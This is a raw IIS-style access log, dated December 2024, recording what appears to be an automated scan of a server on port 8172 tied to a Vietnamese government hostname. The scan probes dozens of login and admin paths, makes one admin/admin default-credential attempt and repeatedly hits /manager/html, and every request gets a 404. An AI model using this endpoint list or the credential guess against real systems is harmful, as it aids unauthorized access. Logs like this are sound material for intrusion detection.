POST /swarm.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.9.17 - 404 7 0 34 2024-12-12 01:50:35 103.153.214.94 POST /xmlpserver/services/XMLPService - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.20 - 404 7 0 42 2024-12-12 01:52:54 103.153.214.94 POST /api/v1/auth/tokens/ - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 01:56:20 103.153.214.94 POST / q=common/login 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36 - 404 7 0 34 2024-12-12 01:56:39 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 40 2024-12-12 01:58:36 103.153.214.94 GET /backend/backend/auth/signin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 104 2024-12-12 01:59:28 103.153.214.94 POST /login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 51 2024-12-12 01:59:28 103.153.214.94 POST /inter/ajax.php cmd=get_user_login_cmd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 35 2024-12-12 01:59:28 103.153.214.94 POST /login/userverify.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 01:59:55 103.153.214.94 POST /supershell/login/auth - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.24+(KHTML,+like+Gecko)+Version/17.2+Safari/616.24 - 404 7 0 34 2024-12-12 01:59:59 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 55 2024-12-12 01:59:59 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 122 2024-12-12 01:59:59 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 34 2024-12-12 01:59:59 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 80 2024-12-12 02:01:23 103.153.214.94 POST /login/userverify.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login/login.htm 404 7 0 33 2024-12-12 02:01:24 103.153.214.94 GET /config/pw_left_bar.html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 57 2024-12-12 02:01:24 103.153.214.94 POST /manager/login.php - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 40 2024-12-12 02:01:26 103.153.214.94 POST /pentaho/j_spring_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 37 2024-12-12 02:01:26 103.153.214.94 POST /php/login.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 02:14:25 103.153.214.94 POST /appInfo/assert - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 02:15:05 103.153.214.94 POST /public/checklogin.htm - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 35 2024-12-12 02:15:46 103.153.214.94 POST /api/v1/signin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 02:15:46 103.153.214.94 POST /api/v1/signin - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 02:15:46 103.153.214.94 POST /api/v1/signin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 38 2024-12-12 02:17:49 103.153.214.94 GET /api/whoami - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 41 2024-12-12 02:17:49 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.87+Safari/537.36 - 404 7 0 55 2024-12-12 02:24:13 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 02:24:13 103.153.214.94 GET /login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 63 2024-12-12 02:27:17 103.153.214.94 GET /cgi-bin/login.cgi username=admin&password=admin 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 62 2024-12-12 02:27:17 103.153.214.94 POST /web/guest/tw/websys/webArch/login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.3+Safari/605.1.15 - 404 7 0 34 2024-12-12 02:30:06 103.153.214.94 POST /index.php action=login.index 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 bcvt.kontum.gov.vn:8172/index.php?action=login.index 404 7 0 62 2024-12-12 02:30:07 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 30 2024-12-12 02:30:09 103.153.214.94 POST /forms/doLogin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.16.12+(KHTML,+like+Gecko)+Version/17.7.92+Safari/617.16.12 - 404 7 0 31 2024-12-12 02:30:16 103.153.214.94 POST /login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 https://bcvt.kontum.gov.vn:8172/login.html 404 7 0 37 2024-12-12 02:30:35 103.153.214.94 GET /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 54 2024-12-12 02:30:54 103.153.214.94 POST /sws/app/gnb/login/login.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 02:31:48 103.153.214.94 POST /op/op.Login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 62 2024-12-12 02:31:48 103.153.214.94 POST /seeyon/rest/authentication/ucpcLogin - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 64 2024-12-12 02:31:48 103.153.214.94 POST /main.ehp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 31 2024-12-12 02:31:51 103.153.214.94 POST /seeyon/management/index.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 34 2024-12-12 02:31:56 103.153.214.94 POST /WebConfig/lua/auth.lua - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 32 2024-12-12 02:31:56 103.153.214.94 POST /WebConfig/lua/auth.lua - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 https://bcvt.kontum.gov.vn:8172 404 7 0 36 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 118 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 116 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 - 404 7 0 111 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.54 - 404 7 0 119 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 119 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 133 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 137 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 139 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 101 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 100 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 101 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.21+(KHTML,+like+Gecko)+Version/17.0+Safari/616.21 - 404 7 0 100 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 98 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 - 404 7 0 100 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 99 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/15.0.0+Version/17.3.1+Safari/605.1.15 - 404 7 0 100 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 101 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 99 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 109 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 105 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 108 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 107 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 110 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 109 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 112 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 144 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 - 404 7 0 146 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 148 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 146 2024-12-12 02:36:15 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 - 404 7 0 148 2024-12-12 02:36:24 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 150 2024-12-12 02:36:24 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/39.0.2171.99+Safari/537.36 - 404 7 0 174 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 - 404 7 0 115 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 115 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 158 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 - 404 7 0 120 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.82+Safari/537.36 - 404 7 0 119 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 129 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.5.20 - 404 7 0 130 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 130 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 141 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 140 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 111 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 111 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.22 - 404 7 0 114 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 114 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 - 404 7 0 115 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 114 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 115 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 122 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.3 - 404 7 0 121 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 121 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 104 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 111 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 128 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 129 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 129 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 127 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 128 2024-12-12 02:36:25 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 - 404 7 0 129 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 90 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 88 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 88 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 89 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 89 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/73.0.3683.75+Safari/537.36 - 404 7 0 89 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 92 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 92 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 92 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 116 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 121 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 121 2024-12-12 02:36:35 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 139 2024-12-12 02:36:36 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/73.0.3683.75+Safari/537.36 - 404 7 0 113 2024-12-12 02:36:36 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 